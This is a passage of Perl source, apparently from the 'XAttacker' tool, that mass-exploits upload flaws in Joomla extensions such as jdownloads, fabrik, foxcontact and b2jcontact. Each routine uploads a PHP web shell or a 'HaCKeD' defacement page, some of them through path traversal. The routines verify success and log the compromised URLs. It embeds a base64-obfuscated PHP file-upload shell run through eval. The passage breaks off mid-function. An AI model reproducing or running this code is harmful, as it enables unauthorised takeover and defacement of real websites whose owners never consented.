  6023. print color('bold red'),"] ";
  6024. print color('bold white'),"Com Media";
  6025. print color('bold white')," ......................... ";
  6026. print color('bold green'),"VULN\n";
  6027. print color('bold green')," [";
  6028. print color('bold red'),"+";
  6029. print color('bold green'),"] ";
  6030. print color('bold white'),"File Uploaded Successfully\n";
  6031. print color('bold white'),"  [Link] => $mediaup\n";
  6032. open (TEXT, '>>Result/index.txt');
  6033. print TEXT "$mediaup\n";
  6034. close (TEXT);
  6035. }else{
  6036. print color('bold red'),"[";
  6037. print color('bold green'),"+";
  6038. print color('bold red'),"] ";
  6039. print color('bold white'),"Com Media";
  6040. print color('bold white')," ......................... ";
  6041. print color('bold red'),"Failed\n";
  6042. }
  6043. }
  6044.  
  6045.  
  6046. ################ comjdownloads #####################
  6047. sub comjdownloads(){
  6048. $file="tool/Jattack.rar";
  6049. $filez="tool/XAttacker.php.php.j";
  6050. $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
  6051. $shellpath= $site . '/images/jdownloads/screenshots/XAttacker.php.j?X=Attacker';
  6052.  
  6053. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  6054. $ua->timeout(10);
  6055. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  6056.  
  6057. my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"moham3driahi@gmail.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  6058.  
  6059. my $checkshell = $ua->get("$shellpath")->content;
  6060. if($checkshell =~/X Attacker/) {
  6061. print color('bold red'),"[";
  6062. print color('bold green'),"+";
  6063. print color('bold red'),"] ";
  6064. print color('bold white'),"Com Jdownloads";
  6065. print color('bold white')," .................... ";
  6066. print color('bold green'),"VULN\n";
  6067. print color('bold green')," [";
  6068. print color('bold red'),"+";
  6069. print color('bold green'),"] ";
  6070. print color('bold white'),"Shell Uploaded Successfully\n";
  6071. print color('bold white'),"  [Link] => $shellpath\n";
  6072. open (TEXT, '>>Result/Shells.txt');
  6073. print TEXT "$shellpath\n";
  6074. close (TEXT);
  6075. }else{
  6076. print color('bold red'),"[";
  6077. print color('bold green'),"+";
  6078. print color('bold red'),"] ";
  6079. print color('bold white'),"Com Jdownloads";
  6080. print color('bold white')," .................... ";
  6081. print color('bold red'),"Failed\n";
  6082. comjdownloadsdef();
  6083. }
  6084. }
  6085.  
  6086.  
  6087. ################ comjdownloads index #####################
  6088. sub comjdownloadsdef(){
  6089. $def = $site . '/images/jdownloads/screenshots/XAttacker.html.j';
  6090. $filee="tool/Jattack.rar";
  6091. $filezz="tool/XAttacker.html.j";
  6092. my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"moham3driahi@gmail.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  6093. if ($exploitx->content =~ /The file was successfully transferred to the server/) {
  6094.  
  6095.  
  6096. my $response = $ua->get("$def")->status_line;
  6097. if ($response =~ /200/){
  6098. print color('bold red'),"[";
  6099. print color('bold green'),"+";
  6100. print color('bold red'),"] ";
  6101. print color('bold white'),"Com Jdownloads Index";
  6102. print color('bold white')," .............. ";
  6103. print color('bold green'),"VULN\n";
  6104. print color('bold green')," [";
  6105. print color('bold red'),"+";
  6106. print color('bold green'),"] ";
  6107. print color('bold white'),"Index Uploaded Successfully\n";
  6108. print color('bold white'),"  [Link] => $def\n";
  6109. open (TEXT, '>>Result/index.txt');
  6110. print TEXT "$def\n";
  6111. close (TEXT);
  6112. }else{
  6113. print color('bold red'),"[";
  6114. print color('bold green'),"+";
  6115. print color('bold red'),"] ";
  6116. print color('bold white'),"Com Jdownloads Index";
  6117. print color('bold white')," .............. ";
  6118. print color('bold red'),"Failed\n";
  6119.         }
  6120. }
  6121. else{
  6122. print color('bold red'),"[";
  6123. print color('bold green'),"+";
  6124. print color('bold red'),"] ";
  6125. print color('bold white'),"Com Jdownloads Index";
  6126. print color('bold white')," .............. ";
  6127. print color('bold red'),"Failed\n";
  6128.  
  6129. }
  6130. }
  6131.  
  6132. ################ comfabrik #####################
  6133. sub comfabrik(){
  6134. my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
  6135. my $shell ="tool/XAttacker.php";
  6136. my $field_name = "Filedata";
  6137.  
  6138. my $response = $ua->post( $url,
  6139.             Content_Type => 'form-data',
  6140.             Content => ["userfile" => ["$shell"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
  6141.            
  6142.             );
  6143.  
  6144. $comfabrikupp="$site/media/XAttacker.php?X=Attacker";
  6145.  
  6146. $checkcomfabrikupp = $ua->get("$comfabrikupp")->content;
  6147. if($checkcomfabrikupp =~/X Attacker/) {
  6148.  
  6149. print color('bold red'),"[";
  6150. print color('bold green'),"+";
  6151. print color('bold red'),"] ";
  6152. print color('bold white'),"Com Fabrik";
  6153. print color('bold white')," ........................ ";
  6154. print color('bold green'),"VULN\n";
  6155. print color('bold green')," [";
  6156. print color('bold red'),"+";
  6157. print color('bold green'),"] ";
  6158. print color('bold white'),"Shell Uploaded Successfully\n";
  6159. print color('bold white'),"  [Link] => $comfabrikupp\n";
  6160. open (TEXT, '>>Result/index.txt');
  6161. print TEXT "$comfabrikupp\n";
  6162. close (TEXT);
  6163. }else{
  6164. print color('bold red'),"[";
  6165. print color('bold green'),"+";
  6166. print color('bold red'),"] ";
  6167. print color('bold white'),"Com Fabrik";
  6168. print color('bold white')," ........................ ";
  6169. print color('bold red'),"Failed\n";
  6170.   comfabrikdef();
  6171. }
  6172. }
  6173.  
  6174. ################ comfabrik index #####################
  6175. sub comfabrikdef(){
  6176. my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
  6177. my $index ="tool/XAttacker.txt";
  6178. my $field_name = "Filedata[]";
  6179.  
  6180. my $response = $ua->post( $url,
  6181.             Content_Type => 'form-data',
  6182.             Content => ["userfile" => ["$index"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
  6183.            
  6184.             );
  6185.  
  6186. $comfabrikup="$site/media/XAttacker.txt";
  6187.  
  6188. $checkcomfabrikup = $ua->get("$comfabrikup")->content;
  6189. if($checkcomfabrikup =~/HaCKeD/) {
  6190.  
  6191. print color('bold red'),"[";
  6192. print color('bold green'),"+";
  6193. print color('bold red'),"] ";
  6194. print color('bold white'),"Com Fabrik Index";
  6195. print color('bold white')," .................. ";
  6196. print color('bold green'),"VULN\n";
  6197. print color('bold green')," [";
  6198. print color('bold red'),"+";
  6199. print color('bold green'),"] ";
  6200. print color('bold white'),"File Uploaded Successfully\n";
  6201. print color('bold white'),"  [Link] => $comfabrikup\n";
  6202. open (TEXT, '>>Result/shells.txt');
  6203. print TEXT "$comfabrikup\n";
  6204. close (TEXT);
  6205. }else{
  6206. print color('bold red'),"[";
  6207. print color('bold green'),"+";
  6208. print color('bold red'),"] ";
  6209. print color('bold white'),"Com Fabrik Index";
  6210. print color('bold white')," .................. ";
  6211. print color('bold red'),"Failed\n";
  6212. }
  6213. }
  6214.  
  6215. ################ Com Media #####################
  6216. sub comfabi2(){
  6217. my $url = "$site/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  6218. my $inn ="tool/XAttacker.php";
  6219. my $field_name = "file";
  6220.  
  6221. my $response = $ua->post( $url,
  6222.             Content_Type => 'multipart/form-data',
  6223.             Content => [ $field_name => ["$inn"] ]
  6224.            
  6225.             );
  6226.  
  6227. $mediauph="$site/XAttacker.php?X=Attacker";
  6228.  
  6229. $checkpofwuph = $ua->get("$mediauph")->content;
  6230. if($checkpofwuph =~/X Attacker/) {
  6231. print color('bold red'),"[";
  6232. print color('bold green'),"+";
  6233. print color('bold red'),"] ";
  6234. print color('bold white'),"Com Fabrik2 Shell";
  6235. print color('bold white')," ................ ";
  6236. print color('bold green'),"VULN\n";
  6237. print color('bold green')," [";
  6238. print color('bold red'),"+";
  6239. print color('bold green'),"] ";
  6240. print color('bold white'),"Shell Uploaded Successfully\n";
  6241. print color('bold white'),"  [Link] => $mediauph\n";
  6242. open (TEXT, '>>Result/shells.txt');
  6243. print TEXT "$mediauph\n";
  6244. close (TEXT);
  6245. }else{
  6246. print color('bold red'),"[";
  6247. print color('bold green'),"+";
  6248. print color('bold red'),"] ";
  6249. print color('bold white'),"Com Fabrik2";
  6250. print color('bold white')," ....................... ";
  6251. print color('bold red'),"Failed\n";
  6252. }
  6253. }
  6254.  
  6255. ################ comfabrik index2 #####################
  6256. sub comfabrikdef2(){
  6257. my $url = "$site/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  6258. my $index ="tool/XAttacker.txt";
  6259.  
  6260. my $response = $ua->post( $url,
  6261.             Content_Type => 'form-data',
  6262.             Content => ["file" => ["$index"]]
  6263.            
  6264.             );
  6265.  
  6266. $comfabrikup2="$site/XAttacker.txt";
  6267.  
  6268. $checkcomfabrikup = $ua->get("$comfabrikup2")->content;
  6269. if($checkcomfabrikup =~/HaCKeD/) {
  6270.  
  6271. print color('bold red'),"[";
  6272. print color('bold green'),"+";
  6273. print color('bold red'),"] ";
  6274. print color('bold white'),"Com Fabrik Index2";
  6275. print color('bold white')," .................. ";
  6276. print color('bold green'),"VULN\n";
  6277. print color('bold green')," [";
  6278. print color('bold red'),"+";
  6279. print color('bold green'),"] ";
  6280. print color('bold white'),"File Uploaded Successfully\n";
  6281. print color('bold white'),"  [Link] => $comfabrikup2\n";
  6282. open (TEXT, '>>Result/index.txt');
  6283. print TEXT "$comfabrikup2\n";
  6284. close (TEXT);
  6285. }else{
  6286. print color('bold red'),"[";
  6287. print color('bold green'),"+";
  6288. print color('bold red'),"] ";
  6289. print color('bold white'),"Com Fabrik2 Index";
  6290. print color('bold white')," ................. ";
  6291. print color('bold red'),"Failed\n";
  6292. }
  6293. }
  6294. ################ Com Media #####################
  6295. sub comjb(){
  6296. my $url = "$site/components/com_jbcatalog/libraries/jsupload/server/php";
  6297. my $inn ="tool/XAttacker.php";
  6298. my $field_name = "files[]";
  6299.  
  6300. my $response = $ua->post( $url,
  6301.             Content_Type => 'multipart/form-data',
  6302.             Content => [ $field_name => ["$inn"] ]
  6303.            
  6304.             );
  6305.  
  6306. $mediauph="$site/components/com_jbcatalog/libraries/jsupload/server/php/files/XAttacker.php?X=Attacker";
  6307.  
  6308. $checkpofwuph = $ua->get("$mediauph")->content;
  6309. if($checkpofwuph =~/X Attacker/) {
  6310. print color('bold red'),"[";
  6311. print color('bold green'),"+";
  6312. print color('bold red'),"] ";
  6313. print color('bold white'),"com_jbcatalog Shell";
  6314. print color('bold white')," .............. ";
  6315. print color('bold green'),"VULN\n";
  6316. print color('bold green')," [";
  6317. print color('bold red'),"+";
  6318. print color('bold green'),"] ";
  6319. print color('bold white'),"Shell Uploaded Successfully\n";
  6320. print color('bold white'),"  [Link] => $mediauph\n";
  6321. open (TEXT, '>>Result/shells.txt');
  6322. print TEXT "$mediauph\n";
  6323. close (TEXT);
  6324. }else{
  6325. print color('bold red'),"[";
  6326. print color('bold green'),"+";
  6327. print color('bold red'),"] ";
  6328. print color('bold white'),"com_jbcatalog";
  6329. print color('bold white')," ..................... ";
  6330. print color('bold red'),"Failed\n";
  6331. }
  6332. }
  6333. ################ Com Media #####################
  6334. sub comsjb(){
  6335. my $url = "$site/modules/mod_socialpinboard_menu/saveimagefromupload.php";
  6336. my $inn ="tool/XAttacker.php";
  6337. my $field_name = "uploadfile";
  6338.  
  6339. my $response = $ua->post( $url,
  6340.             Content_Type => 'multipart/form-data',
  6341.             Content => [ $field_name => ["$inn"] ]
  6342.            
  6343.             );
  6344. if ($response->content =~ /(.*?)php/) {
  6345. $uploadfolder=$1.'php?X=Attacker';
  6346. }          
  6347.  
  6348. $mediauph="$site/modules/mod_socialpinboard_menu/images/socialpinboard/temp/$uploadfolder";
  6349.  
  6350. $checkpofwuph = $ua->get("$mediauph")->content;
  6351. if($checkpofwuph =~/X Attacker/) {
  6352. print color('bold red'),"[";
  6353. print color('bold green'),"+";
  6354. print color('bold red'),"] ";
  6355. print color('bold white'),"socialpinboard Shell";
  6356. print color('bold white')," ............. ";
  6357. print color('bold green'),"VULN\n";
  6358. print color('bold green')," [";
  6359. print color('bold red'),"+";
  6360. print color('bold green'),"] ";
  6361. print color('bold white'),"Shell Uploaded Successfully\n";
  6362. print color('bold white'),"  [Link] => $mediauph\n";
  6363. open (TEXT, '>>Result/shells.txt');
  6364. print TEXT "$mediauph\n";
  6365. close (TEXT);
  6366. }else{
  6367. print color('bold red'),"[";
  6368. print color('bold green'),"+";
  6369. print color('bold red'),"] ";
  6370. print color('bold white'),"socialpinboard";
  6371. print color('bold white')," .................... ";
  6372. print color('bold red'),"Failed\n";
  6373. }
  6374. }
  6375. ################ foxcontact #####################
  6376. sub foxfind(){
  6377.  
  6378.  
  6379. $foxup="$site/components/com_foxcontact/js/fileuploader.js";
  6380.  
  6381. my $checkfoxup = $ua->get("$foxup")->content;
  6382. if ($checkfoxup =~ /upload/) {
  6383. print color('bold red'),"[";
  6384. print color('bold green'),"+";
  6385. print color('bold red'),"] ";
  6386. print color('bold white'),"Com Foxcontact";
  6387. print color('bold white')," .................... ";
  6388. print color('bold green'),"FOUND\n";
  6389. fox2();
  6390. open (TEXT, '>>Result/foundcomfoxcontact.txt');
  6391. print TEXT "$foxup\n";
  6392. close (TEXT);
  6393. }else{
  6394. print color('bold red'),"[";
  6395. print color('bold green'),"+";
  6396. print color('bold red'),"] ";
  6397. print color('bold white'),"Com Foxcontact";
  6398. print color('bold white')," .................... ";
  6399. print color('bold red'),"Failed\n";
  6400. }
  6401. }
  6402. ################ foxcontact #####################
  6403. sub foxcontact(){
  6404.  
  6405. @foxvuln= ("components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php",
  6406. "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php",
  6407. "index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php",
  6408. "components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php");
  6409. OUTER: foreach $foxvuln(@foxvuln){
  6410. chomp $foxvuln;
  6411.  
  6412. my $url = "$site/$foxvuln";
  6413.  
  6414. my $shell ="tool/XAttacker.php";
  6415.  
  6416. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ ["$shell"] ]);
  6417.  
  6418. $foxup="$site/components/com_foxcontact/_func.php?X=Attacker.php";
  6419. }
  6420. my $checkfoxup = $ua->get("$foxup")->content;
  6421. if ($checkfoxup =~ /X Attacker/) {
  6422. print color('bold red'),"[";
  6423. print color('bold green'),"+";
  6424. print color('bold red'),"] ";
  6425. print color('bold white'),"Com Foxcontact";
  6426. print color('bold white')," .................... ";
  6427. print color('bold green'),"VULN\n";
  6428. print color('bold green')," [";
  6429. print color('bold red'),"+";
  6430. print color('bold green'),"] ";
  6431. print color('bold white'),"Shell Uploaded Successfully\n";
  6432. print color('bold white'),"  [Link] => $foxup\n";
  6433. open (TEXT, '>>Result/shells.txt');
  6434. print TEXT "$foxup\n";
  6435. close (TEXT);
  6436. }else{
  6437. print color('bold red'),"[";
  6438. print color('bold green'),"+";
  6439. print color('bold red'),"] ";
  6440. print color('bold white'),"Com Foxcontact";
  6441. print color('bold white')," .................... ";
  6442. print color('bold red'),"Failed\n";
  6443. }
  6444. }
  6445. ################ foxcontact #####################
  6446. sub fox2(){
  6447.  
  6448. my @filesz = ('/kontakty','kontakty.html','contatti.html','/index.php/kontakty','/contact','contacto','/index.php/contato.html','en/contact','contactenos');
  6449. OUTER: foreach $vulz(@filesz){
  6450. my $url = "$site/$vulz";
  6451. print colored ("[ Scanning Foxcontact]",'white on_blue'),$url."\n";
  6452. my $checkfoxupx = $ua->get("$url")->content;
  6453. if ($checkfoxupx =~ /foxcontact/) {
  6454.     my $regex='<a name="cid_(.*?)">';
  6455.     if($checkfoxupx =~ s/$regex//){
  6456.         my $regex='<a name="mid_(.*?)">';
  6457.     if($checkfoxupx =~ s/$regex//){
  6458. }
  6459. my @files = ('components/com_foxcontact/lib/file-uploader.php?cid='.$1.'&mid='.$1.'&qqfile=/../../izoc.php','index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id='.$1.'?cid='.$1.'&mid='.$1.'&qqfile=/../../izoc.php','index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id='.$1.'&cid='.$1.'&mid='.$1.'&owner=module&id='.$1.'&qqfile=/../../izoc.php','components/com_foxcontact/lib/uploader.php?cid='.$1.'&mid='.$1.'&qqfile=/../../izoc.php');
  6460. OUTER: foreach my $vul(@files){
  6461. chomp $vul;
  6462.  my $izo = $site . $vul;
  6463. my $indexa='<?php
  6464. eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));
  6465. ?>';
  6466. my $body = $ua->post( $izo,
  6467.         Content_Type => 'multipart/form-data',
  6468.         Content => $indexa
  6469.         );
  6470. $foxups="$site/components/com_foxcontact/izoc.php";
  6471. }      
  6472. my $checkfoxup = $ua->get("$foxups")->content;
  6473. if ($checkfoxup =~ /izocin/) {
  6474. print color('bold red'),"[";
  6475. print color('bold green'),"+";
  6476. print color('bold red'),"] ";
  6477. print color('bold white'),"Com Foxcontact2";
  6478. print color('bold white')," ................... ";
  6479. print color('bold green'),"VULN\n";
  6480. print color('bold green')," [";
  6481. print color('bold red'),"+";
  6482. print color('bold green'),"] ";
  6483. print color('bold white'),"Shell Uploaded Successfully\n";
  6484. print color('bold green'),"[Link] => $foxups\n";
  6485. open (TEXT, '>>Result/shells.txt');
  6486. print TEXT "$foxups\n";
  6487. close (TEXT);
  6488. }else{
  6489. print color('bold red'),"[";
  6490. print color('bold green'),"+";
  6491. print color('bold red'),"] ";
  6492. print color('bold white'),"Com Foxcontact2";
  6493. print color('bold white')," ................... ";
  6494. print color('bold red'),"Failed\n";
  6495. }
  6496. }
  6497. }
  6498. }
  6499. }
  6500. ################ comadsmanager #####################
  6501. sub comadsmanager(){
  6502. my $url = "$site/index.php?option=com_adsmanager&task=upload&tmpl=component";
  6503.  
  6504. my $response = $ua->post( $url,
  6505.             Cookie => "", Content_Type => "form-data", Content => [file => ["tool/XAttacker.jpg"], name => "tool/XAttacker.html"]
  6506.            
  6507.             );
  6508.  
  6509. $comadsmanagerup="$site/tmp/plupload/XAttacker.html";
  6510.  
  6511. $checkcomadsmanagerup = $ua->get("$comadsmanagerup")->content;
  6512. if($checkcomadsmanagerup =~/HaCKeD/) {
  6513. print color('bold red'),"[";
  6514. print color('bold green'),"+";
  6515. print color('bold red'),"] ";
  6516. print color('bold white'),"Com Ads Manager";
  6517. print color('bold white')," ................... ";
  6518. print color('bold green'),"VULN\n";
  6519. print color('bold green')," [";
  6520. print color('bold red'),"+";
  6521. print color('bold green'),"] ";
  6522. print color('bold white'),"File Uploaded Successfully\n";
  6523. print color('bold white'),"  [Link] => $comadsmanagerup\n";
  6524. open (TEXT, '>>Result/index.txt');
  6525. print TEXT "$comadsmanagerup\n";
  6526. close (TEXT);
  6527. }else{
  6528. print color('bold red'),"[";
  6529. print color('bold green'),"+";
  6530. print color('bold red'),"] ";
  6531. print color('bold white'),"Com Ads Manager";
  6532. print color('bold white')," ................... ";
  6533. print color('bold red'),"Failed\n";
  6534. }
  6535. }
  6536.  
  6537. ################ b2jcontact #####################
  6538. sub b2j(){
  6539.  
  6540. my @filesz = ('/kontakty','iletisim','contatti.html','contact-us','contact-us.html','/contact','contacto','/index.php/contato.html','en/contact','contactenos');
  6541. OUTER: foreach $vulz(@filesz){
  6542. my $url = "$site/$vulz";
  6543. my $checkfoxupx = $ua->get("$url")->content;
  6544. if($checkfoxupx =~/b2j/) {
  6545. print color('bold red'),"[";
  6546. print color('bold green'),"+";
  6547. print color('bold red'),"] ";
  6548. print color('bold white'),"B2j Contact";
  6549. print color('bold white')," ........................";
  6550. print color('bold green'),"VULN\n";
  6551. print color('bold red'), "Testing Vuln $url \n";
  6552.     print color('reset');
  6553.     my $regex='" name="cid_(.*?)"';
  6554.     if($checkfoxupx =~ s/$regex//){
  6555.     print color("bold red"), "Cid no: $1\n";
  6556.         print color('reset');
  6557.     my $out = $1;
  6558.     my $regex='bid=(.*?)"';
  6559.     if($checkfoxupx =~ s/$regex//){
  6560.     print color("bold red"), "Bid no: $1\n";
  6561.         my $bid = $1;
  6562.         my $izo = $site . 'index.php?option=com_b2jcontact&amp;view=loader&amp;owner=component&amp;id='.$out.'&amp;bid='.$bid.'&amp;root=&type=uploader&&owner=component&id='.$out.'&qqfile=586cfc73826e4-/../izoc.php';
  6563.             print color('reset');
  6564. my $index='<?php
  6565. eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));
  6566. ?>';
  6567. my $body = $ua->post( $izo,
  6568.         Content_Type => 'multipart/form-data',
  6569.         Content => $index
  6570.         );
  6571. my $checkfoxupx = $ua->get("$site/components/com_b2jcontact/uploads/izoc.php")->content;
  6572. if ($checkfoxupx =~ /izocin/) {
  6573. print color('bold red'),"Shell Uploaded Successfully\n";
  6574. print color('bold green'),"[ShellLink] => $site/components/com_b2jcontact/uploads/izoc.php\n";
  6575.             print color('reset');
  6576. open (TEXT, '>>Result/shell.txt');
  6577. print TEXT "$site/components/com_b2jcontact/uploads/izoc.php\n";
  6578. close (TEXT);
  6579. }else{
  6580. print color('bold red'),"[";
  6581. print color('bold green'),"+";
  6582. print color('bold red'),"] ";
  6583. print color('bold white'),"B2j Contact";
  6584. print color('bold white')," ....................... ";
  6585. print color('bold red'),"Failed\n";        
  6586. }
  6587. }
  6588. }
  6589. }
  6590. }
  6591. }
  6592. sub b22j(){
  6593.  
  6594. my @filesz = ('/index.php/contact','/index.php/contact/adres','/kontakty','kontakty.html','contatti.html','/index.php/kontakty','/contact','contacto','/index.php/contato.html','en/contact','contactenos','contact-us');
  6595. OUTER: foreach $vulz(@filesz){
  6596. my $url = "$site/$vulz";
  6597.     print colored ("[ Scanning B2J]",'white on_blue'),$url."\n";
  6598. my $cms = $ua->get("$url")->content;
  6599. if($cms =~/b2j/) {
  6600.     print color("bold red"), "Joomla B2jcontact Found\n";
  6601. print color('bold red'), "Testing Vuln $url - \n";
  6602.     print color('reset');
  6603.     my $regex='name="b2jmoduleid_(.*?)"';
  6604.     if($cms =~ s/$regex//){
  6605.     print color("bold red"), "Cid no: $1\n";
  6606.         print color('reset');
  6607.     my $out = $1;
  6608.     my $regex='bid=(.*?)"';
  6609.     if($cms =~ s/$regex//){
  6610.     my $bid = $1;
  6611.     print color("bold red"), "Bid no: $1\n";
  6612. }  
  6613. my @filesx = ('/index.php?option=com_b2jcontact&amp;view=loader&amp;owner=component&amp;id='.$out.'&amp;bid='.$bid.'&amp;root=&type=uploader&&owner=component&id='.$out.'&qqfile=586cfc73826e4-/../izoc.php','/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=586cfc73826e4-/../izoc.php','/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid='.$bid.'&id='.$out.'&Itemid='.$out.'&qqfile=586cfc73826e4-/../izoc.php','/index.php/component/b2jcontact/loader/module/'.$out.'/components/b2jcontact/'.$bid.'&qqfile=586cfc73826e4-/../izoc.php','/component/b2jcontact/loader/module/'.$out.'/components/b2jcontact/'.$bid.'&qqfile=586cfc73826e4-/../izoc.php','index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=586cfc73826e4-/../izoc.php','/index.php/contact/loader/component/'.$out.'/components/b2jcontact/1&qqfile=586cfc73826e4-/../izoc.php');
  6614. OUTER: foreach my $vulx(@filesx){
  6615.  my $izo = $site . $vulx;
  6616.         print color('reset');      
  6617. my $index='<?php
  6618. eval(bAsE64_DecOde("ZWNobyAnaXpvY2luPGJyPicucGhwX3VuYW1lKCkuJzxmb3JtIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSI+Jy4nPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gKXtpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICdVcGxvYWQgT0snO31lbHNlIHtlY2hvICdVcGxvYWQgRmFpbCc7fX0="));
  6619. ?>';
  6620. my $body = $ua->post( $izo,
  6621.         Content_Type => 'multipart/form-data',
  6622.         Content => $index
  6623.         );
  6624.         print color('bold red'),"waiting...\n";
  6625.         }
  6626. my $checkfoxupx = $ua->get("$site/components/com_b2jcontact/uploads/izoc.php")->content;
  6627. if ($checkfoxupx =~ /izocin/) {
  6628. print color('bold red'),"Shell Uploaded Successfully\n";
  6629. print color('bold green'),"[ShellLink] => $site/components/com_b2jcontact/uploads/izoc.php\n";
  6630.             print color('reset');
  6631. open (TEXT, '>>Result/shell.txt');
  6632. print TEXT "$site/components/com_b2jcontact/uploads/izoc.php\n";
  6633. close (TEXT);
  6634. }else{
  6635. print color('bold red'),"[";
  6636. print color('bold green'),"+";
  6637. print color('bold red'),"] ";
  6638. print color('bold white'),"B2j Contact";
  6639. print color('bold white')," ....................... ";
  6640. print color('bold red'),"Failed\n";        
  6641. }
  6642. }
  6643. }
  6644. }
  6645. }
  6646. ################ comsexycontactform #####################
  6647. sub sexycontactform(){
  6648. my $url = "$site/com_sexycontactform/fileupload/index.php";
  6649. my $shell ="tool/XAttacker.php";
  6650. my $field_name = "files[]";
  6651.  
  6652. my $response = $ua->post( $url,
  6653.             Content_Type => 'multipart/form-data',
  6654.             Content => [ $field_name => ["$shell"] ]
  6655.            
  6656.             );
  6657.  
  6658. $sexyup="$site/com_sexycontactform/fileupload/files/XAttacker.php?X=Attacker";
  6659.  
  6660. $checkpofxwup = $ua->get("$sexyup")->content;
  6661. if($checkpofxwup =~/X Attacker/) {
  6662. print color('bold red'),"[";
  6663. print color('bold green'),"+";
  6664. print color('bold red'),"] ";
  6665. print color('bold white'),"Com sexycontactform";
  6666. print color('bold white')," ............... ";
  6667. print color('bold green'),"VULN\n";
  6668. print color('bold green')," [";
  6669. print color('bold red'),"+";
  6670. print color('bold green'),"] ";
  6671. print color('bold white'),"File Uploaded Successfully\n";
  6672. print color('bold white'),"  [Link] => $sexyup\n";
  6673. open (TEXT, '>>Result/shell.txt');
  6674. print TEXT "$sexyup\n";
  6675. close (TEXT);
  6676. }else{
  6677. print color('bold red'),"[";
  6678. print color('bold green'),"+";
  6679. print color('bold red'),"] ";
  6680. print color('bold white'),"Com sexycontactform";
  6681. print color('bold white')," ............... ";
  6682. print color('bold red'),"Failed\n";
  6683. }
  6684. }
  6685.  
  6686. sub comblog(){
  6687.  
  6688. my $url = "$site/index.php?option=com_myblog&task=ajaxupload";
  6689. my $shell ="tool/XAttacker.php.xxxjpg";
  6690. my $field_name = "fileToUpload";
  6691.  
  6692. my $response = $ua->post( $url,
  6693.             Content_Type => 'multipart/form-data',
  6694.             Content => [ $field_name => ["$shell"] ]
  6695.            
